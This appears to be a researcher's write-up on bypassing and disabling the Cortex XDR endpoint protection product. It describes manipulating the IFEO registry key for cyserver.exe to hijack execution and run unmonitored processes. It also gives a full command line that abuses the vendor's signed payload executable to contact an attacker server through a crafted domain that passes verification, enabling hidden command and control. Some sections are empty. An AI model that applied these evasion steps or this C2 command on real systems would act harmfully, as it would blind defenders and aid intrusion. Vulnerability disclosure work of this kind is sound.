# Cortex XDR tampering module bypass and other evasion tricks.

## Introduction

### A bit about Cortex XDR 

Cortex XDR is an endpoint detection and response (EDR) software. Most of enterprise grade EDR software is managed from cloud by administrator, therefore the users or even local administrators shouldn't be able to disable or disrupt the work of such process. That is possible thanks to Protected Process Light (PPL) technology. More details about PPL can read on Microsoft website. This article will describe the tricks that I have used to evase or completely disable Cortex XDR.

### Cortex XDR on endpoint

## Exploiting vulns :D

### IFEO manipulation - complete loss of protection

IFEO is short for "Image File Execution Options". According to MITRE and Microsoft documentation it's main purpose is to facilitate debugging process. Adversary, can use it also for malicious purposes such as establishing persistence and impairing defenses. The attack is performed through manipulation of the "Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\image File Execution Options\cyserver.exe" IFEO registry. Afterwards, reboot or service restart is required.

- Hijack execution flow – Local admin can manipulate IFEO keys for any Paloalto image that is being executed as child process of “cyserver.exe” to launch custom application. When this application is launched under “cyserver.exe”, it is neither prevented nor monitored against any malicious activity. The attack requires reboot or administrative action from the cloud (initializing the live terminal or launching custom script).

### IFEO manipulation - unmonitored process



### Hidden command & control thanks to Paloalto signed executable

 "cortex-xdr-payload.exe" live terminal feature can be used to contact malicious attacker server, when run with command line "cortex-xdr-payload.exe -type 1 -server "randompage.com/?.paloaltonetworks.com" -port 443 -token 123". The "randompage.com/?.paloaltonetworks.com" is able to bypass the domain verification.